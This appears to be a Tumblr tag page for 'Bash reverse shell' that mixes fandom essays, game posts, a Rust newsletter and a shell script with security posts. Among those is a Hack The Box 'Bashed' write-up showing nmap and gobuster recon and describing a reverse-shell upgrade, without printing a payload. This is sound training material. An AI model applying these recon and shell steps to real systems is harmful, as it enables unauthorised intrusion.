#Bash Reverse Shell
joy-jules · 2 days
DogCat - Exploiting LFI and Docker Privilege Escalation -TryHackMe Walkthrough
In this walkthrough, we’ll explore the Dogcat room on TryHackMe, a box that features a Local File Inclusion (LFI) vulnerability and Docker privilege escalation. LFI allows us to read sensitive files from the system and eventually gain access to the server.There are a total of 4 flags in this machine which we need to find. Let’s Dive in! Step 1: Scanning the Target Start by scanning the target…
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justatalkingface · 3 months
Aizawa didn’t get into the hero course until his second year and was bullied by Sensoji for being a waste of space.
And Sensoji's actions were justified.
Now stick with me here.
Isn’t it a bit odd how Bakugou's behavior was justified? And I don't mean just in a favoritism way.
Despite how much he was willing to bash Class 1-A, Hitoshi didn't seem to acknowledge Aizawa favoring Bakugou. Not once. This is odd as he was there when Aizawa openly defended Bakugou during the Sports Festival. And you'd think Aizawa would correct Hitoshi's opinions on Class 1-A, but he doesn't.
And with how Aizawa made the battle between both hero courses focus on Hitoshi...
I'm sorry. Correct me if I'm wrong but...
Was Aizawa setting things up for Hitoshi to become like him? Was Bakugou going to be set up to be another Sensoji that Hitoshi had to face off?
Because if the war didn't happen...Hitoshi was going to be in Class 1-A way earlier.
...I don't think Eraserhead is self-aware enough to plan something like, which is saying something because even more self-awareness would tell him how stupid it is, but...
It's hard to get past the fact that, fundamentally, he's a hollow shell of a man. In all likelihood, he was a mess before Oboro, but after he died? I think something just... broke inside him.
This isn't really something I talk about, but at the core of him, Eraserhead is someone going through the motions, just existing one day at a time. He doesn't seem to have... goals. Objectives. Plans. Desires. Dreams. All he really has is his work, and he's not really doing his work well, is the thing. The first thing he does after getting life altering injuries is go back to work the next day, held together by staples and a prayer. Logically, that not only put back his healing, it might have actually worsened how much permanent damage he had.
He works day and night, and it's clear he's not managing his time well by his constant exhaustion, so most likely if he's not doing UA stuff, or being dragged around by his friends, he's off fighting crime. I mean, hell, he barely even eats.
He doesn't shave, he doesn't clean up, he doesn't get his hair cut... all of that stuff is because he probably doesn't have the energy or will to do it, and, real talk? I honestly wonder if he's so skinny because he's malnourished in some form, because those jelly packets or whatever can't actually be meeting all his nutritional needs, especially with how much energy he has to be burning every day.
I think the main reason Present Mic and Midnight got him to join UA was to save his life. Not from a major threat or anything, but from himself. With him at UA, they could dial him back, stop him from running around picking fights and parkouring across roofs 24/7, and maybe even get a real meal in him.
All of the stuff I've been talking about... 'logically', doesn't that ruin his vaulted 'efficiency'?
When Eraserhead says, 'efficiency', or 'logically', or whatever other word he uses to sound smart, he doesn't really mean, 'doing it in the best way possible', even if he's lying to himself that he is; what he's actually saying is 'doing it the most simple and straightforward way possible, right now'. If he thinks a student is too much trouble, rather than trying to fix the problem he just gets rid of them, and if they manage to pull themselves together after he does that? All the better.
The reverse, though, is as long as they aren't too much of a problem, then they're not actually worth punishing, not unless he's basiclly forced to: he doesn't let Bakugou run wild because he likes him, really, he does it because he doesn't think dealing with him is worth his time, the same way he lets Minoru be a creepy little pervert without really doing anything to make him stop, until he finally crosses the line enough that Eraserhead has to be involved, like by putting a kid in danger. The reason his only comment when he holds Bakugou back that first time is about his dry eye is that honestly, that was all he actually cared about: not that he was attacking other students, but that Bakugou was making him do extra work.
It's why the few times we see him actually deal with a student's problems (that weren't his favorite, anyways) is when he was already doing something else involving them in the first place, because if he's already there, working with them, might as well do this other shit, right?
It's only efficient.
To bring it back to your original point, though, I think part of the reason he's such a hypocrite is he doesn't really reflect on himself, or his actions. While he does think on the past, it's not anything productive, it's just him... wallowing in his grief and self loathing.
The reason Hitoshi was the main focus was because, well, Hitoshi was Eraserhead's main focus, so he wanted him to get a lot of the experience everyone else had been having as fast as possible, and beyond that I don't think he was thinking through the implications beyond that.
I've found a lot of Eraserhead's actions make sense if you ignore everything he says, and instead draw a metaphorical straight line between him and whatever it is that he wants to do. It's not deep, it's just so OOC for a normal thought process that it throws you off.
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shuttershocky · 2 months
Guard up on heavy bowgun (spread ammo) or gunlance is fun. Block everything and never move away from the target
I'm going to be honest, I don't like guarding with the Gunlance.
I wish the Gunlance had just one offensive move that actually used its shield. Rise gave it a counter (that raises sharpness) and Guard Reload has a Guardpoint, but otherwise Gunlance's shield feels tacked on, like it's just there because the Lance has a shield.
Even Sword and Shield, the weakest shield, has shield bashes to stun the monster and Rise adding a parry mechanic to Guard Slash means you can actually invest in Guard to increase the number of moves you can parry. The Shield is an actual part of the moveset you can invest in.
But the Gunlance is all gun. Even Sunbreak's new moves in Reverse Blast Dash, Erupting Cannon, and Bullet Barrage were based around blasting things. They're extremely fun, but at this point I think they should just get rid of the shield and go all in on the Gun if the Shield just makes you slow and people would rather just use Evade Extender 3 to move a bit to the side instead of blocking. After all, Shells don't care about hitzones, so moving a bit out of position isn't so bad (especially when blast dash lets you rocket around the place in Rise, which wasn't an option in World).
Otherwise, I'd like at least one shield attack with a guard point to weave in to the poke and shell combo. I'm not saying it has to be as good as the Lance since Guard Points on everything and counters out the wazoo is the lance's identity, but give me a reason for the Gunlance shield to exist you know? If I'm blocking with it instead of hopping sideways, it means I messed up my timings and I can't just dodge this next attack.
Heavy Bowgun getting Greatsword's Tackle makes you feel like a fucking boss though. With 1 shield and one hyperarmor move you really do never have to budge.
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seventeenlovesthree · 2 years
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Fandom Shipping Polls - Meiko Mochizuki Shipping Analysis (Poll)
As pointed out in the main post, every single Chosen Child will get their individual analysis post to check on the status of the current popularity of their ships. With that out of the way, let’s take a look at Meiko, shall we!  
The overall results / spreadsheet
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The “Others” choice in the main poll received 15% (approx. 8 votes). The comments/tags did not specify any preferences here (aside from characters that were already part of the main choices).
Ship Analysis
1st place: With a lead of merely 11 votes to 2nd place, Mimi (42%) won the overall poll. Despite the poll having received the least amount of votes overall (since there has only been one), it is not too surprising to see her here - she had been the first (alongside Sora) to take Meiko under her wing and seemed incredibly smitten by her bashful nature, trying to get her out of her shell, encouraging her to wear more daring clothes and generally believing more in herself, while also constantly defending and protecting her from others. Between a lot of physical touches (including cheek kisses), affectionate words and blushing, seeing Meiko bloom because of Mimi’s encouragement definitely makes this a favourite.
2nd place: Taichi (22%) comes in second in this poll - and seeing their set-up in Tri, it’s almost shocking that the race between him and Mimi hasn’t been more close. Ever since their glances crossed (silently at first on several occasions), their paths were meant to mirror each other; with Taichi not being able to face his cowardice or either of his friends properly, he finds solace in being able to talk to Meiko - who, just like he had to in the past, has to deal with the corruption and eventual loss of her partner. Thus, his protectiveness of her also makes sense - and the subtle bond upon him calling her and blushing due to not finding the right words may not be understated.
3rd place: Facing no real threat to get surpassed, Yamato (13%) finished third on the podest - and, once again, with good reason. While Meiko actually learns more about Yamato by talking to his brother about him, his tendency to jump in to save her is pretty blatant. Yamato is a person who is protective of characters in need of help and also cannot stand seeing people jump towards their own doom head first. 
Honorary mentions: This spot is reserved for Takeru (4%), who was seen bonding with and teasing/flirting with Meiko on several occasions, while also sharing (and hiding) the fate of losing their partners, with him trying to help her to face the consequences.
“The 1 vote squad”: Koushiro and Jou (1% each) take this place.
“0 votes go to…”: Both Sora and Hikari have received 0 votes.
Annotations: The “Others” option received an interesting number of 8 votes, but unfortunately, there hasn’t been any clarification on who was favoured there (whether it was a character in Tri-verse or otherwise).
What did the other polls say?
Meiko hasn’t won any of the other character’s polls and also hasn’t made it to any podiums. However, she has receiced minor/niche attention in several polls; first of all, mirorring her own polls, by making an appearance in Mimi’s (7%) and Taichi’s (7%), but also getting votes in Sora’s (6%), Takeru’s (5%), Hikari’s (4%) Yamato’s (2%) and Jou’s (1%)
Koushiro is the only character in whose poll she received 0 votes (despite him having gotten 1 vote in hers in reverse).
Notable additions / comments / thoughts
Since Meiko is a character who only appears in the Tri movies as a re-occuring (main) character, she obviously does not get as much exposure as the other characters overall and also doesn’t have any interactions with any of the 02 characters aside from Takeru and Hikari. Hence there was no necessity for a second poll - which also means that she got the least amount of votes overall. (Of course there may be spheres in the fandom that also see her as a more controversial character, but we shall only focus on the positive aspects of the shipping here.)
Taking into account that my blog may or may not be visited by Digimon fans who have a preference for same sex ships - and due to their constant framing together -, it should come to no surprise that Mimi still managed to sweep the overall vote. While I expected the race between Taichi and Yamato to be tighter as well, I was also surprised to see the distribution of votes among the other characters. Meichi generally gets a lot of - understandable - framing, so Taichi’s placement is more than valid; however, Yameiko has slowly but steadily become more of a fan favourite due to several analysis posts taking a deeper look into their relationship.
When it comes to the other characters, she does have vital moments with Takeru, Sora and Hikari in canon - and while Takeru actually received a (comparably) decent amont of (niche) votes, I was surprised not to see Sora and Hikari represented in Meiko’s own poll, while she got at least niche attention in each of the other girls’ polls. (On a personal note, there may actually be a memory bias in place here, because I had forgotten a lot of the more memorable moments between her with each Takeru, Sora and Hikari, so I can only assume that this may have been the case for others as well.)
Since Meiko had no interpersonal visible interaction with Koushiro and Jou on screen outside of plot related reasons, the low number of votes is understandable.
The comments in the tags have only referred to the already mentioned choices. So the “Others” option did not reveal any other potentially preferred suitors. This leaves room for speculation, but usually, the option is reserved for OC ships, for when people prefer to not ship a character at all or when they’re considered asexual (which will definitely be a future option to include as well!). Thus, I really hope to reach a wider audience if I choose to repeat the polls once the fandom is not as quiet as it is right now.
Other Analysis Posts 
Taichi Yagami Shipping Analysis
Yamato Ishida Shipping Analysis
Sora Takenouchi Shipping Analysis
Koushiro Izumi Shipping Analysis
Mimi Tachikawa Shipping Analysis
Jou Kido Shipping Analysis
Takeru Takaishi Shipping Analysis
Hikari Yagami Shipping Analysis
Daisuke Motomiya Shipping Analysis
Ken Ichijouji Shipping Analysis
Miyako Inoue Shipping Analysis
Iori Hida Shipping Analysis
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samxia99 · 5 days
What The Shell?: Part 1| TryHackMe
An introduction to sending and receiving (reverse/bind) shells when exploiting target machines. Task 1 What is a shell? shells are what we use when interfacing with a Command Line environment (CLI). In other words, the common bash or sh programs in Linux are examples of shells, as are cmd.exe and Powershell on Windows. When targeting remote systems it is sometimes possible to force an…
0 notes
jprie · 9 months
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What programming languages are best for cyber security?
Cybersecurity is a diverse field that encompasses various tasks such as penetration testing, network security, malware analysis, cryptography, and more. Different programming languages are suitable for different aspects of cybersecurity. Here are some programming languages commonly used in the field:
Widely used in cybersecurity for its simplicity and readability.
Extensive libraries and frameworks (e.g., Scapy, PyCrypto, Requests) make it suitable for tasks such as network scanning, scripting, and automation.
Popular for developing security tools and scripts.
Essential for web security.
Used for both offensive (e.g., cross-site scripting) and defensive (e.g., securing web applications) purposes.
C and C++:
Commonly used in low-level programming and for developing security-related tools.
Useful for tasks such as reverse engineering and writing exploits.
Often used in enterprise environments for developing secure applications.
Android apps are primarily written in Java, making it important for mobile security.
Known for its simplicity and productivity.
Metasploit, a popular penetration testing framework, is written in Ruby.
Bash/Shell scripting:
Essential for writing scripts to automate tasks and perform system-level operations.
Go (Golang):
Known for its efficiency and performance.
Used in developing security tools and for tasks like building scalable network applications.
Important for database security and understanding how attackers exploit database vulnerabilities.
Assembly Language:
Essential for low-level understanding, especially in reverse engineering and analyzing malware.
Historically used for various security tasks, though its popularity has decreased in recent years.
When choosing a programming language for cybersecurity, it's important to consider the specific tasks you want to perform and the tools you'll be working with. Many cybersecurity professionals use a combination of languages to address different aspects of their work. Additionally, staying updated on the latest developments in cybersecurity and understanding the tools and frameworks available in the community is crucial for success in the field.
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leam1983 · 11 months
On Toolsets
Walt asks me what's wrong with AI being the object of so much attention, in his usual out-of-touch-yet-curious approach, and also asks me how I'd fix it.
There's fundamentally nothing wrong with General Adversarial Networks, be they processing images or text inputs. The tech in and of itself is rife with potential. The problem is that the tech's emergence is systematic of a greater problem with Late-Stage Capitalism.
Imagine Fred Flintstone's Modern Stoneage, but with our current set of values, for a second. You predate the invention of the hammer, and some snazzy-looking caveman realizes that you can make shit by tying a rock to a stick, by using the stick as a handle, and by bashing things into other things using that tool. He calls it a hammer.
The world goes nuts overnight. Hammer Discourse is everywhere, you've got a fuckton of comers telling you that no, their use for a hammer is more productive instead of everyone else's, and that you're right to expect a concrete return on all those hammer swings. Hammers are seen as fungible, and any serious effort to study hammers or deepen their understanding is drowned out by the droves of people claiming that you can MAKE MONEY NOW! JUST USE MY NEW AND IMPROVED HAMMER GRIP TECHNIQUE! GET THOSE CONCH SHELLS FROM YOUR NEIGHBOUR AT AN INCREASED RATE!
In the meantime, there's another group that's realized that the hammer, when paired with a chisel, can chip off stone. With enough control and precision, you can carve beautiful things out of stone. The vultures start circling, see profit there, and decide that just about anyone's stone slabs can be used for figurative efforts, with no need for consultation.
And that, right there, is the issue. It's in the short-sightedness of the response to the tech in question. Poisoning image models won't do shit, the model-makers are going to reverse-engineer solutions like Glaze and offer means to keep tapping into poisoned datasets effectively. They'll never bother with consent, not when immediacy remains their focus.
The only way to fix this is to design image models with consent as a base, ideally for purely research-focused uses. The only ethical image-generation system out there shouldn't be released to the public, as it's there that you'll find the idiots crowing for AGI this and AGI that, profit this and profit that, when we're effectively designing clockwork savants. Could the tech be useful? Absolutely! NASA's already using it to prototype robots!
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the-hacker-news · 1 year
Free Download Manager Site Compromised to Distribute Linux Malware to Users for 3+ Years
The Hacker News : A download manager site served Linux users malware that stealthily stole passwords and other sensitive information for more than three years as part of a supply chain attack. The modus operandi entailed establishing a reverse shell to an actor-controlled server and installing a Bash stealer on the compromised system. The campaign, which took place between 2020 and 2022, is no longer active. " http://dlvr.it/Sw5mw6 Posted by : Mohit Kumar ( Hacker )
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this-week-in-rust · 2 years
This Week in Rust 456
Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.
This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.
Updates from Rust Community
Announcing Rust 1.63.0
Contribute to the diagnostic translation effort!
This Month in Rust GameDev #36
Project/Tooling Updates
rust-analyzer changelog #142
IntelliJ Rust Changelog #176
Introducing Rust Sitter
SecureStore 0.100: KISS, git-versioned secrets management for rust
This week in Fluvio #42: The programmable streaming platform
HexoSynth 2022 - Devlog #9 - MIDI Note and CC Handling
Rust Search Extension v1.8.0 has been released.
This week in Databend #55: A Modern Cloud Data Warehouse for Everyone
Comparing Rust's and C++'s Concurrency Library
Kernel Driver with Rust in 2022
IntoIterator and the for ... in Syntax in Rust
Rust in Perspective — linusw
6 Things I Wish I Knew Starting with Embedded Rust
Rust Walkthroughs
Exploring Traits with Erased serde
Rust and Neovim - A Thorough Guide and Walkthrough
Get Started with Rust: Structs
Hooking Go from Rust - Hitchhiker’s Guide to the Go-laxy
Using the Kani Rust Verifier on Tokio Bytes
[video] Rust image viewer from scratch
[video] Rust is not a faster horse (why Rust is different)
[video] Fiberplane's path to full-stack WASM development
Integrating fault injection in development workflows
Rust Iterator pattern with iter(), into_iter() and iter_mut() methods
[DE] Rust: Makros - Einführung in ein unverzichtbares Werkzeug
[DE] Rust 1.63 bekommt Threads, die sich Daten ausleihen dürfen
Crate of the Week
This week's crate is cargo-pgo, a cargo subcommand to compile your code with profile-guided optimization and BOLT for good measure.
Thanks to Jakub Beránek for the self-suggestion!
Please submit your suggestions and votes for next week!
Call for Participation
Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!
Some of these tasks may also have mentors available, visit the task page for more information.
If you are a Rust project owner and are looking for contributors, please submit tasks here.
ockam - Add examples section to ockam message send command's help
ockam - ockam completion --shell {bash|zsh|fish} command for shell completion
ockam - Visualize identity change history in ockam identity show --full command
mirrord - Cache doesn't work on test-agent workflow
mirrord - Split mirrord-layer LayerError based on criteria
Updates from the Rust Project
410 pull requests were merged in the last week
make [rust] use-lld=true work on windows
debuginfo: generalize C++-like encoding for enums
recover from mutable variable declaration where mut is placed before let
suggest a missing semicolon before an array
suggest adding an appropriate missing pattern excluding comments
suggest const and static for global variable
suggest removing let if const let or let const is used
suggest removing a semicolon after impl/trait items
suggest the path separator when a dot is used on a trait
adjust span of fn argument declaration
point to generic or arg if it's the self type of unsatisfied projection predicate
do not manually craft a span pointing inside a multibyte character
argument type error improvements
set tainted errors bit before emitting coerce suggestions
iterate generics_def_id_map in reverse order to fix P-critical issue
miri: atomics must be mutable
make TypeError impl Copy
determine match_has_guard from candidates instead of looking up thir table again
optimize thread ID generation
simplify visitors
simplify format_args builtin macro implementation
stabilize backtrace
stabilize ptr_const_cast
replace pointer casting in hashmap_random_keys with safe code
add Iterator::array_chunks (take N+1)
optimize next and nth implementations of Skip
compiler-builtins: remove c32() from x86_64 memcmp
cargo: only override published resolver when the workspace is different
cargo: use std::thread::scope to replace crossbeam
rustdoc: don't document impossible to call default trait items on impls
rustdoc: avoid ICE in rustdoc when using Fn bounds
rustdoc: improve crate selection on rustdoc search results page
rustdoc: don't render impl blocks with doc comment if they only contain private items by default
rustdoc: fix handling of stripped enum variant in JSON output format
rustdoc: use a more compact encoding for implementors/trait.*.js
clippy: add lint recommending using std::iter::once and std::iter::empty
clippy: add partialeq_to_none lint
clippy: extend if_then_some_else_none to also suggest bool::then_some
clippy: fix if_let_mutex not checking mutexes behind refs
clippy: fixes trait_duplication_in_bounds false positives
clippy: skip unnecessary_to_owned when t != t.to_string()
clippy: use check_proc_macro for missing_const_for_fn
rust-analyzer: do not unconditionally succeed RUSTC_WRAPPER checks when run by build scripts
rust-analyzer: fix pattern field completions not working for unions
rust-analyzer: move VSCode diagnostics workaround into client code
rust-analyzer: pad empty diagnostic messages in relatedInformation as well
rust-analyzer: recover from missing ellipsis in record literals for path expressions
rust-analyzer: remove imports that are also in edition 2021's prelude
rust-analyzer: fix incorrect type mismatch with cfg_if! and other macros in expression position
rust-analyzer: infer byte string pattern as &[u8] when matched against slices
Rust Compiler Performance Triage
A fairly quiet week for performance, with the exception of the LLVM 15 upgrade which resulted in many changes, mostly to the positive.
Triage done by @simulacrum. Revision range: cc4dd6fc9f..14a459b3
(instructions:u) mean max count Regressions ❌ (primary) 0.7% 7.7% 62 Regressions ❌ (secondary) 1.3% 5.0% 51 Improvements ✅ (primary) -1.8% -6.9% 93 Improvements ✅ (secondary) -2.4% -22.0% 128 All ❌✅ (primary) -0.8% 7.7% 155
2 Regressions, 4 Improvements, 2 Mixed; 1 of them in rollups 38 artifact comparisons made in total
Full report
Call for Testing
An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:
No RFCs issued a call for testing this week.
If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.
Approved RFCs
Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:
No RFCs were approved this week.
Final Comment Period
Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.
No RFCs entered Final Comment Period this week.
Tracking Issues & PRs
[disposition: close] Tracking Issue for Result::into_ok_or_err / feature(result_into_ok_or_err)
[disposition: merge] Tracking issue for RFC 2046, label-break-value
[disposition: merge] Tracking Issue for #![feature(mixed_integer_ops)]
[disposition: merge] Tracking Issue for std::io::read_to_string
New and Updated RFCs
[new] Add atomic memcpy RFC.
Upcoming Events
Rusty Events between 2022-08-17 - 2022-09-14 🦀
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Rust Study/Hack/Hang-out
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Hierarchical Task Network compiler written in Rust
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Iran Rust Meetup #8
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Stammtisch: together with the C++ UG KA; various topics, from C++ to Rust
2022-08-27 | Virtual (Bangalore, IN) | Polkadot India
Substrate Saturday - Bootcamp Series 2: Fundamentals of Rust & Substrate
2022-08-30 | Virtual (Berlin, DE) | OpenTechSchool Berlin
Rust Hack and Learn
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Last Tuesday
2022-09-01 | Virtual | Google Open Source Live
Rust Day on Google Open Source Live
2022-09-02 | Virtual (Nürnberg, DE) | Rust Nuremberg
Rust Nuremberg Get Together
2022-09-03 | Virtual (Bangalore, IN) | Polkadot India
Substrate Saturday - Bootcamp Series 2: Fundamentals of Rust & Substrate
2022-09-03 | Virtual (Nürnberg, DE) | Rust Nuremberg
Deep Dive Session 1: Tokio my-redis Tutorial
2022-09-04 | Virtual (Seattle, WA, US) | Seattle Rust Meetup
September Meetup
2022-09-06 | Virtual (Beijing, CN) | WebAssembly and Rust Meetup (Rustlang)
Monthly WasmEdge Community Meeting, a CNCF sandbox WebAssembly runtime
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Buffalo Rust User Group, First Tuesdays
2022-09-07 | Virtual (Indianapolis, IN, US) | Indy Rust
Indy.rs - with Social Distancing
2022-09-10 | Virtual | Rust GameDev
Rust GameDev Monthly Meetup
2022-09-10 | Virtual (Bangalore, IN) | Polkadot India
Substrate Saturday - Bootcamp Series 2: Fundamentals of Rust & Substrate
2022-09-13 | Virtual (Rostock, DE) | Altow Academy
Rust Meetup Rostock
2022-09-14 | Virtual (Malaysia)| Golang Malaysia
Rust Meetup September 2022
2022-08-18 | Paris, FR | Rust Paris
Rust Paris meetup #51
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0x21: Learning from Rust, Typical C++
2022-08-30 | Utrecht, NL | Rust Nederland
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North America
2022-08-23 | Toronto, ON, CA | Rust Toronto
WebAssembly plugins in Rust
2022-08-25 | Ciudad de México, MX | Rust MX
Concurrencia & paralelismo con Rust
2022-08-25 | Lehi, UT, US | Utah Rust
Hello World Cargo Crates Using Github Actions with jojobyte and Food!
2022-08-31 | New York, NY, US | Rust NYC
August Meetup: Rewriting a high performance Vector Database in Rust.
2022-08-24 | Wellington, NZ + Virtual | Rust Wellington
Flywheel Edition: 3 talks on Rust!
2022-08-26 | Melbourne, VIC, AU | Rust Melbourne
August 2022 Meetup
If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.
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Quote of the Week
TL;DR: my claim is that Rust is attempting to raise the abstraction in the programming language and ultimately to join computer science and software engineering into one single discipline, an ambition that has been around since these disciplines were created.
– Linus Walleij on his blog
Thanks to Julian Wollersberger for the suggestion!
Please submit quotes and vote for next week!
This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, andrewpollack, U007D, kolharsam, joelmarcey, mariannegoldin.
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iomonk · 2 years
Script to read metadata and modify creation date in automator.
Will need to modify it to pass the date and use to change file names to reflect date photo was taken.
for f in "$@" do touch -t $(date -j -f "%Y%m%d%H%M" -v-6H $(mdls $f | grep kMDItemContentCreationDate | head -n1 | awk '{gsub("[^[:digit:]]+"," ");print $1$2$3$4$5}') +%Y%m%d%H%M) $f done
OK, found another of his videos and merged the ideas into this script In automator add run shell script and check the dropdown is at bin/zsh, not bash, and use as argument...
for f in "$@" do date_str=$(date -j -f "%Y%m%d%H%M" -v+3H $(mdls "$f" | grep kMDItemContentCreationDate | head -n1 | awk '{gsub("[^[:digit:]]+"," ");print $1$2$3$4$5}') +%Y%m%d%H%M) filename=$f:t filepath=$f:h mv $filepath/{"$filename","$date_str $filename"} done
Thanks to this dude! Video 1
And video 2
Everything else down here is pretty much mumbo jumbo... ignore
So this gets me the clean content creation date from the file in terminal
prj_seca20230222-001.jpeg | grep kMDItemContentCreationDate | head -n1 | awk '{gsub("[^[:digit:]]+"," ");print $1$2$3$4$5}'
The following will be just random notes for myself
if photo taken in Peru date -j -f "%Y%m%d%H%M" -v+3H (00-05+08) reverse the Cupertino time to 00 and then to Perú time
$( to evaluate what is inside parenthesis ) +%Y%m%d%H%M to spit it out in that format
for f in "$@" do date_str=$(date -j -f "%Y%m%d%H%M" -v+3H $(mdls "$f" | grep kMDItemContentCreationDate | head -n1 | awk '{gsub("[^[:digit:]]+"," ");print $1$2$3$4$5}') +%Y%m%d%H%M) echo "$date_str" done
to rename
for f in "$@"; do date_str=$(date -j -f "%Y%m%d%H%M" -v+3H "$(mdls "$f" | grep kMDItemContentCreationDate | head -n1 | awk '{gsub("[^[:digit:]]+"," "); print $1$2$3$4$5}') " +%Y%m%d%H%M) extension="${f##*.}" mv "$f" "${date_str}.${extension}" done
This is an example of parameter expansion in Bash shell.
The ${f##*.} syntax removes the longest matching pattern of *. (i.e., any character followed by a dot) from the beginning of the value of $f, which is a filename string. This effectively strips off the filename prefix, leaving only the file extension.
For example, if $f is my_file.txt, then ${f##*.} would evaluate to txt.
So the line extension="${f##*.}" assigns the file extension (if any) of the current file to the $extension variable.
To strip the extension and the last 3 characters from a filename, you can use parameter expansion with the ${var%pattern} syntax.
Here's an example command that removes the file extension and the last 3 characters from the filename stored in the $filename variable:
newname="${filename%.*}"  newname="${newname%???}"
The first line removes the file extension (if any) from the filename by removing the shortest matching pattern of .* (i.e., a dot followed by any characters) from the end of the string.
The second line removes the last 3 characters from the filename by removing the shortest matching pattern of ??? (i.e., any 3 characters) from the end of the string.
After these two lines, the resulting $newname variable will contain the filename with the extension and last 3 characters removed.
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tesshex · 2 years
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Uh-oh, it’s that time again! I got Scarlet over the festive period, I just-now got Ed Sheeran’d, and so it’s on me to share the latest additions to the TessHex family!
As ever, headcanons below...
RUPERT the QUAQUAVAL | Docile nature | Takes plenty of siestas | Sir, That Is A Twink I sort of feel bad, because I’d promised myself that I was going to pick Sprigatito in Scarlet, but having played through Violet with a Skeledirge, Quaquaval proved itself a more appealing option than Meowscarada. That footnote aside, Rupert reminds me, rather, of Sylvando from Dragon Quest XI-- flamboyant, camp, profoundly gymnastic, and very quick to call someone “honey”, “darling”, or “my little pogchamp”. Gives great-- if damp-- hugs.
TABITHA the TALONFLAME | Careful nature | Capable of taking hits | A Very Good Boye (Gender-Neutral) “Tabs”, for short. I planned a few members of my team in advance, but she wasn’t one of them. Rather, I encountered her right at the start of my journey, realised how well she would fit in my type-coverage synergy, and the rest was history! She went through a phase of carrying an Amulet Coin for good luck, but finally relinquished it when-- far later than she would have liked-- she learned Flamethrower. She’s proud of how far she’s grown since we met.
EVENSONG the DUSK LYRCANROC | Calm nature | Thoroughly cunning | Blatant Furrybait Evensong was another unplanned addition to the team, but as I passed by a pack of Rockruff, I thought-- hey, why not? With the help of a local Ralts, I was able to identify an Own Tempo candidate (on my second try, no less!), and Evensong was as good as family on the spot. Generally very chill, and has a very long fuse... but if you do manage to rile him up, his revenge will be swift, agonising, and cut far deeper than you might expect.
GRAND MARTHA the TOEDSCRUEL | Bashful nature | A little quick-tempered | The Queen Incidentally, it was Grand Martha I was looking for when I found Evensong, since I had to go a bit out of my way to find a Toedscool in the first place. Yes-- this was one of my pre-planned team-members, and part of the reason I chose Quaxly over Sprigatito in the end. Grand Martha-- use her full title, if you please-- is no stranger to fighting on the front lines, despite her personal preference to hang back. In many ways, her personality is the reverse of Evensong’s, in that she’s quick to anger, and quicker still to get all self-conscious about having blown up in the first place...
ĦMISTAX the GHOLDENGO | Serious nature | Has good endurance | Weird And/Or Floaty Another of the team-members I had planned in advance. True, they spent most of the journey hiding inside a treasure-chest, until we could amass 999 Gimmighoul Coins, but when they came out of their shell, they came out in a big way. Serious when it counts, but eager to befriend anyone who hasn’t given them a reason for them not to do so, and happy to lean into their innate oddness in order to make friends and bring smiles. ...The name is the Maltese word for “fifteen”, by the way. Sort of sounds like “hhhmoustache”.
DONNA the BAXCALIBUR | Careful nature | Likes to thrash about | Danger Personified The final pre-planned member of the team, and as befits an Ice/Dragon-type, she was slow to warm up to her new teammates... since she was a good 10 levels ahead of everyone else when she joined, and some 15 levels beyond what I was qualified to give orders to, so she had to hang back for most battles for quite a while! After achieving her final form when battling an outbreak of Sinistea, she really came into her own as a force to be reckoned with, and has no qualms about throwing her weight around. If she joins the battle, take that as a sign that you’ve messed up big-time-stylie... and start praying.
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cyberpayload · 3 years
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#Bash #reverse #tcp #shell #oneliner . . . #linux #ethical #hacking #pentester #hacker #exploit #popashell #security #cybersecurity #computer #pc #windows #virtualmachine #kali #parrot #cyberops #cyber #raspberrypi #python https://www.instagram.com/p/CTMQ4meLqvA/?utm_medium=tumblr
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pillothecat-hacks · 3 years
Hack The Box: Bashed – Writeup
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---------------------------------------------- Reconnaissance - Open port enumeration - Directories and files enumeration
Shell upgrade
Privilege Escalation - Check for misconfigurations - Inject reverse-shell payload ----------------------------------------------
nmap scan Check for open ports; run the nmap scan. ** though flag options may vary, I’ve included -O (for OS), -sV (for service version), -Pn (to check for active machines with ping disabled), -sC (for script), and -sS (for stealth).
INPUT: sudo nmap -sSCV -O -Pn | tee “nmapscan”
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There is only one open port, port 80. Since port 80 is a http service, we should be able to open up the web-server application from our browser and view the site. Moreover, since http is an unencrypted web server, we might be able to find some information from the site’s source code.
Gobuster Run a gobuster scan to enumerate web directories/files. ** I’ve run gobuster with the common.txt file (in /usr/share/wordlists/dirb/)
INPUT: gobuster dir -u /usr/share/wordlists/dirb/common.txt | tee gobuster
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There is only one network status 200, and a couple of redirects. Immediately we might notice some common directories like “css”, “images”, and fonts”, but the information also tells us that the site utilizes “php” and has an open “dev” directory for us to view.
We can also confirm this when we view the web page; looking through the blog post on the site, we can see that the user “Arrexel” says he has been using phpbash “on this exact server”. Perhaps the phpbash file is within the “dev” for developer directory?
Web page
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*** before checking the “dev” directory, I was also looking for any information that might lead us to an exploit. Though unsuccessful, the site’s Content Management System (CMS) information and a page where we might be able to upload a Remote File Inclusion (RFI) or get to a Local File Inclusion (LFI) was worth examining.
Web page - /dev/ We’ve found the “developers” page and it is unrestricted. This is a serious security misconfiguration, as the open shell gives access to the web-server for anyone. Since Arrexel stated in his blog post that he uses the phpbash for pentesting on this very site, we might expect some additional vulnerabilities once in the server.
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Although we have our initial foothold into the server, the bash shell may be limiting and buggy; there might be frequent freezes or crashes, and we might not be able to control tab complete. Let’s upgrade our shell; we can accomplish this by launching a reverse shell payload from our target’s machine, and set up a listener from our attack machine to catch the signal.
*** I initially tried a php reverse shell and was unsuccessful; I tried the python reverse shell next, and that worked;
*** Don’t forget to set the ip address to your attacker’s, vpn (often labeled as “tun0” from ifconfig)
